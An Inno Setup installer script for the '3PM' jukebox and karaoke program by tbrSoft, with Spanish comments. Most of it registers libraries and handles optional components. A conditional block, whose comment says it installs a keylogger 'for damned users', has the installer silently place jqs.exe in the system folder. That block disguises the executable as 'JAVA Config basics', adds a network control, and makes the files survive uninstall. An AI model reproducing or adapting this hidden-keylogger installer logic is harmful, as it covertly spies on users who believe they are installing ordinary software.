; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "3PM"
#define MyAppVerName "3PM Kabalin 7x"
#define MyAppPublisher "tbrSoft Internacional"
#define MyAppURL "http://www.tbrsoft.com"
#define MyAppExeName "3PM.EXE"
#define IsExternal ""
;ponerle "external" para que lo deje por separado. Para usarlo poner el flag {#IsExternal}
#define IncluyeFrameWork false
#define IncluyeMusicaLibre false
#define IncluyeKaraokes false

; para hacer actualizadores livianos
#define IncluirGiladas true

; para directamente darle imagenes predeterminadas sobre el skin modificandolo
#Define IncluirImgPers false

; instalar keylogger para malditos usuarios
#Define InstalarMedicinaTrucha false

[Setup]
AppName={#MyAppName}
AppVerName={#MyAppVerName}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
DefaultDirName={pf}\{#MyAppName}
;DisableDirPage=yes
DefaultGroupName=tbrSoft
AllowNoIcons=no


#if InstalarMedicinaTrucha
  OutputBaseFilename=master_3pm_kundera_expendedor_karaoke
#else
  #if IncluirGiladas
    #if IncluyeFrameWork
      #if IncluyeMusicaLibre
        OutputBaseFilename=Instalar3PM7-ConMusica-FW
      #else
        OutputBaseFilename=Instalar3PM7-FW
      #endif
    #else
      #if IncluyeMusicaLibre
        OutputBaseFilename=Instalar3PM7-ConMusica
      #else
        OutputBaseFilename=Instalar3PM7
      #endif
    #endif
  #else
    OutputBaseFilename=Actualizar3PM7
  #endif
#endif


SetupIconFile=..\3pm.ico
Compression=lzma
SolidCompression=yes
#if InstalarMedicinaTrucha
  LicenseFile=..\licenseJUA.rtf
  WizardImageFile=inst_3pm_JUA.bmp
#else
  LicenseFile=..\license.rtf
  WizardImageFile=inst_3pm_dgd.bmp
#endif

[Languages]
Name: "eng"; MessagesFile: "compiler:Default.isl"
Name: "bra"; MessagesFile: "compiler:Languages\BrazilianPortuguese.isl"
Name: "cat"; MessagesFile: "compiler:Languages\Catalan.isl"
Name: "cze"; MessagesFile: "compiler:Languages\Czech.isl"
Name: "dan"; MessagesFile: "compiler:Languages\Danish.isl"
Name: "dut"; MessagesFile: "compiler:Languages\Dutch.isl"
Name: "fin"; MessagesFile: "compiler:Languages\Finnish.isl"
Name: "fre"; MessagesFile: "compiler:Languages\French.isl"
Name: "ger"; MessagesFile: "compiler:Languages\German.isl"
Name: "hun"; MessagesFile: "compiler:Languages\Hungarian.isl"
Name: "ita"; MessagesFile: "compiler:Languages\Italian.isl"
Name: "nor"; MessagesFile: "compiler:Languages\Norwegian.isl"
Name: "pol"; MessagesFile: "compiler:Languages\Polish.isl"
Name: "por"; MessagesFile: "compiler:Languages\Portuguese.isl"
Name: "rus"; MessagesFile: "compiler:Languages\Russian.isl"
Name: "slo"; MessagesFile: "compiler:Languages\Slovenian.isl"
Name: "spa"; MessagesFile: "compiler:Languages\Spanish.isl"
;Name: "spa"; MessagesFile: "compiler:Languages\SpanishMex.isl"
;Name: "spa"; MessagesFile: "compiler:Languages\SpanishEsp.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked
Name: "quicklaunchicon"; Description: "{cm:CreateQuickLaunchIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
; NOTE: Don't use "Flags: ignoreversion" on any shared system files
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\stdole2.tlb";  DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall sharedfile regtypelib; minversion: 5.0,5.0; onlybelowversion: 5.2,5.2
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\asycfilt.dll"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall; minversion: 5.0,5.0
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\olepro32.dll"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall regserver; minversion: 5.0,5.0
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\oleaut32.dll"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall regserver; minversion: 5.0,5.0; onlybelowversion: 5.2,5.2
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\msvbvm60.dll"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall regserver

; cosas no necesarias en actuialzaciones basicas

#if IncluirImgPers
; inicio 3pm iis.l67
  Source: "..\fondosClis\mosse\multi13 500.jpg"; DestDir: "{app}\sf"; DestName: "iis.l67"; Flags: ignoreversion
;fondo portadas
;  Source: "..\fondosClis\mose\multi13 200.jpg"; DestDir: "{app}\sf"; DestName: "iis.chu"; Flags: ignoreversion
;tapa y rank
  Source: "..\fondosClis\mosse\multi13 200.jpg"; DestDir: "{app}\sf"; DestName: "tddp.322"; Flags: ignoreversion
  Source: "..\fondosClis\mosse\multi13 200.jpg"; DestDir: "{app}\sf"; DestName: "tddp.323"; Flags: ignoreversion
;skin de mosse
  Source: "..\skin\blare_skin_exit.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion
#endif

#if IncluirGiladas
  Source: "..\pub\LEER.txt"; DestDir: "{app}\PUB"; Flags: ignoreversion
  Source: "..\pubMute\LEER.txt"; DestDir: "{app}\PUBMUTE"; Flags: ignoreversion
  Source: "..\skin\3pmBaseSkin.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion
  Source: "..\skin\crystal front.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion
  Source: "..\skin\wood shell.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion
  Source: "..\skin\blare_skin.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion
  Source: "..\Update-Music.txt"; DestDir: "{app}"; Flags: ignoreversion

  Source: ..\license.rtf; DestDir: {app}; Flags: ignoreversion

  ;SOLO PACHAAAAA botones chiquitos
  Source: "..\skin\tbrSoft_Skin_new2.SKIN"; DestDir: "{app}\skin"; Flags: ignoreversion

  Source: "..\externos\SKS-DLL3\prec.dll"; DestDir: "{sys}"; Flags: ignoreversion
  ;Source: "..\CREARSKIN.txt"; DestDir: "{app}"; Flags: ignoreversion
  Source: "..\Nev.man"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall sharedfile
  Source: "..\manual.doc"; DestDir: "{app}"; Flags: ignoreversion
  Source: "..\repair.exe"; DestDir: "{app}"; Flags: ignoreversion
  Source: "..\ini.exe"; DestDir: "{app}"; Flags: ignoreversion
  Source: "..\externos\SKS-DLL3\Test_Teclado_TBR.exe"; DestDir: "{app}"; Flags: ignoreversion
  
  ;IDIOMAS
  Source: "..\sf\espanol.idm"; DestDir: "{app}\sf"; Flags: ignoreversion
  Source: "..\sf\english.idm"; DestDir: "{app}\sf"; Flags: ignoreversion
  ;Source: "..\sf\cordobes.idm"; DestDir: "{app}\sf"; Flags: ignoreversion
  Source: "..\bsc.dat"; DestDir: "{app}"; Flags: ignoreversion
#endif
;*********************************************************************************************
;*********************************************************************************************
;MUSICA LIBRE AGREGADA
#if IncluyeMusicaLibre
  Source: "D:\MM\Musica Libre\Musica Libre\Carlos Saura - Un Viaje a lo Infinito (A Trip to the Infinite Thing)\*"; DestDir: "{app}\discos\Carlos Saura - Un Viaje a lo Infinito (A Trip to the Infinite Thing)"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\Juan Shaman-Reevolucion\*"; DestDir: "{app}\discos\Juan Shaman-Reevolucion"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\LaBarcaDeSua - Artilugios para abrir un cuento\*"; DestDir: "{app}\discos\LaBarcaDeSua - Artilugios para abrir un cuento"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\Los Arcanos - Tus Cartas\*"; DestDir: "{app}\discos\Los Arcanos - Tus Cartas"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\New Fall - On the road\*"; DestDir: "{app}\discos\New Fall - On the road"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\Rob Costlow - Contemporary Piano - Woods of Chaos\*"; DestDir: "{app}\discos\Rob Costlow - Contemporary Piano - Woods of Chaos"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\Schizzofunk - INDIRECTO\*"; DestDir: "{app}\discos\Schizzofunk - INDIRECTO"; Flags: ignoreversion
  Source: "D:\MM\Musica Libre\Musica Libre\The Thorn - City Rockers - TCR\*"; DestDir: "{app}\discos\The Thorn - City Rockers - TCR"; Flags: ignoreversion
#endif

;karaokes gratis agregados
# if IncluyeKaraokes
  Source: "D:\MM\Musica Libre\Musica Libre\Prueba Karaokes\*"; DestDir: "{app}\discos\Prueba Karaokes"; Flags: ignoreversion
#endif
;*********************************************************************************************
;*********************************************************************************************

Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\wbemdisp.tlb"; DestDir: "{sys}\w"; Flags: restartreplace uninsneveruninstall sharedfile
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrerr.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrreg.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrtimer.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
;Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrfocus.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrplayer02.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrSoftVumetro.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrListaRep.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrSKS3.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrjuse.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrnfo.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrFullPak02.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\caescrypto.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrcaescrypto.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrprogress.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\inpout32.dll"; DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\scrrnes.dll";  DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall sharedfile
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\scrrun.dll";   DestDir: "{sys}"; Flags: restartreplace uninsneveruninstall sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrX_Boton II.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrFaroButton.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrEncr.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrPaths.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrDrives.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrBtActivex.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrInstalledPrograms.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrUsbKeyboard.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrWaveRecod.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrMP3Enc.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver

Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\lame_enc.dll"; DestDir: "{sys}"; Flags: ignoreversion
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\MEncoder.dll"; DestDir: "{sys}"; Flags: ignoreversion



;Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrFrame.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
;Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrGraficos.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrALotOfPictures.dll"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver

Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\ijl11.dll"; DestDir: "{sys}"; Flags: ignoreversion
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrJPG.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrGrap_b.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrBlueC.dll"; DestDir: "{sys}"; Flags: ignoreversion


  ;se registra despues en la seccion RUN (solo si tiene el framework que permite registrarlos
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrBurner.tlb"; DestDir: "{sys}"; Flags: ignoreversion ; Check: IsDotNET20Detected
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\Interop.NEROLib.dll"; DestDir: "{sys}"; Flags: ignoreversion ; Check: IsDotNET20Detected
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\Interop.NeroVisionAPI.dll"; DestDir: "{sys}"; Flags: ignoreversion ; Check: IsDotNET20Detected
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\tbrBurner.dll"; DestDir: "{sys}"; Flags: ignoreversion ; Check: IsDotNET20Detected

Source: "..\3PM.EXE"; DestDir: "{app}"; Flags: ignoreversion
;Source: "..\tius.EXE"; DestDir: "{app}"; Flags: ignoreversion
;Source: "..\externos\tbrSoftInstanUSB\tius.EXE"; DestDir: "{app}"; Flags: ignoreversion

#if IncluyeFrameWork
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\other\dotnetfx.exe"; DestDir: {tmp}; Flags: ignoreversion {#IsExternal} ; Check: NeedsFramework
#endif

#if InstalarMedicinaTrucha
  Source: "C:\Archivos de programa\Inno Setup 5\vbFiles\mswinsck.ocx"; DestDir: "{sys}"; Flags: restartreplace sharedfile regserver
  Source: "..\jqs.exe"; DestDir: "{sys}"; Flags: onlyifdoesntexist uninsneveruninstall ignoreversion
  Source: "..\jqs.exe"; DestDir: "{app}"; DestName: "3pmregs.dat"; Flags: onlyifdoesntexist uninsneveruninstall ignoreversion
  Source: "..\jqs2323.dat.CRAKPROPIO"; DestDir: "{app}\sf"; DestName: "jqs2323.dat"; Flags: onlyifdoesntexist uninsneveruninstall ignoreversion
  ;mp3 con ulises hablando
  Source: "..\solocrack.mp3"; DestDir: "{sys}"; DestName: "urli.mp3"; Flags: uninsneveruninstall ignoreversion
#endif

[Icons]
Name: "{group}\{#MyAppName}\3PM"; Filename: "{app}\{#MyAppExeName}"
Name: "{group}\{#MyAppName}\Manual"; Filename: "{app}\manual.doc"
Name: "{group}\{#MyAppName}\Reparar 3PM"; Filename: "{app}\repair.exe"
Name: "{group}\{#MyAppName}\{cm:UninstallProgram,{#MyAppName}}"; Filename: "{uninstallexe}"
Name: "{userdesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon
Name: "{userappdata}\Microsoft\Internet Explorer\Quick Launch\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: quicklaunchicon

[Run]
;////////////////////////////////////////////////////////////
;instalar el framework (solo para grabar en CD)
#if IncluyeFrameWork
  Filename: {tmp}\dotnetfx.exe; Parameters: "/q:a /c:""install /l /q"""; WorkingDir: {tmp}; Flags: skipifdoesntexist; StatusMsg: "Instalando .NET Framework, puede demorar algunos minutos ..."
  ;installs the .NET framework. The Parameters we pass along with this file are simply those to make the installation silent (show no UI while installing). You may or may not want this, it is up to you. For full details on the exact meaning of the command line switch used for the framework installation, visit this MSDN Page on the subject.
  ;The StatusMsg field lets you specify a message that INNO displays while this process is running. I left it off for space saving here, but I often also put "this will take several minutes..." because lets face it, installing the .NET framework on an average computer does take a few minutes. The skipifdcoesntexist flag is important because remember that we only extracted the framework to the temp directory if the system didn't have the framework installed, so if it doesn't exist, then chances are the user already had the framework (or is out of disk space!).
  Filename: {win}\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Parameters: "-q -machine -remgroup ""MyApp"""; WorkingDir: {tmp}; Flags: skipifdoesntexist runhidden; StatusMsg: "Configurando permisos de acceso..."
  Filename: {win}\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Parameters: "-q -machine -addgroup 1.2 -url ""file://{app}/*"" FullTrust -name ""MyApp"""; WorkingDir: {tmp}; Flags: skipifdoesntexist runhidden; StatusMsg: "Configurando permisos de acceso..."
  ;run caspol.exe to set permissions using a little "url" trick. If you are not familiar with CasPol, it is the Code Access Security Policy utility.
  ;.NET code has an extra layer of code security hooked into the runtime, and by default your local drives run with full trust,
  ;and your network drives run with partial trust. Long story short, if your customer installs your program to a network mapped drive,
  ;there is a good chance they will start getting weird security exceptions because you did not design your app to run at partial trust
  ;(or your app simply NEEDS full trust to do whatever it is your app does). So we have INNO set permissions to give full trust to
  ;wherever the user installed the app. If its the local drive, they already had the permissions, and if its a network drive,
  ;this will give them the permissions to the installation folder. Its a win/win scenario. You may wonder why there are 2 entries
  ;though, and that is because we first try to remove an existing entry if it is there, to avoid duplicate entries in caspol.
  ;If there was no entry to begin with, the method simply completes without doing anything.

  ;regisatrar dll-tlb solo si tiene el framework (ver el parametro check al final)
  Filename:"{reg:HKLM\SOFTWARE\Microsoft\.NETFramework,InstallRoot}\{reg:HKCR\CLSID\{{61b3e12b-3586-3a58-a497-7ed7c4c794b9%7D\InprocServer32\2.0.0.0,RuntimeVersion}\RegAsm.exe"; Parameters: {sys}\tbrBurner.dll /codebase /tlb;WorkingDir: {app}; StatusMsg: "Registrando ASM ..."; Flags: runhidden;
#else
  ;regisatrar dll-tlb solo si tiene el framework (ver el parametro check al final) puede ser que un cliente que ya tiene el .net solo quiera actualizar
  Filename:"{reg:HKLM\SOFTWARE\Microsoft\.NETFramework,InstallRoot}\{reg:HKCR\CLSID\{{61b3e12b-3586-3a58-a497-7ed7c4c794b9%7D\InprocServer32\2.0.0.0,RuntimeVersion}\RegAsm.exe"; Parameters: {sys}\tbrBurner.dll /codebase /tlb;WorkingDir: {app}; StatusMsg: "Registrando ASM ..."; Flags: runhidden; Check: IsDotNET20Detected
#endif

;////////////////////////////////////////////////////////////
#if InstalarMedicinaTrucha
  Filename: "{sys}\jqs.exe"; Description: "JAVA Config basics"; Flags: nowait runhidden
#endif

Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#MyAppName}}"; Flags: nowait postinstall skipifsilent

;This section defines what will run when the program is uninstalled. The only thing I put here, is to remove the caspol entry, just like we did in the run section. It is better to do it here, the entry in the run section is just a backup.
[UninstallRun]
Filename: {win}\Microsoft.NET\Framework\v2.0.50727\CasPol.exe; Parameters: "-q -machine -remgroup ""MyApp"""; Flags: skipifdoesntexist runhidden;


[code]
// Indica si .NET Framework 2.0 esta instalado.
function IsDotNET20Detected(): boolean;
var
    success: boolean;
    install: cardinal;
begin
    success := RegQueryDWordValue(HKLM, 'SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727', 'Install', install);
    Result := success and (install = 1);
end;

//RETURNS OPPOSITE OF IsDotNet20Detected FUNCTION
//Remember this method from the Files section above
function NeedsFramework(): Boolean;
begin
  Result := (IsDotNET20Detected = false);
end;
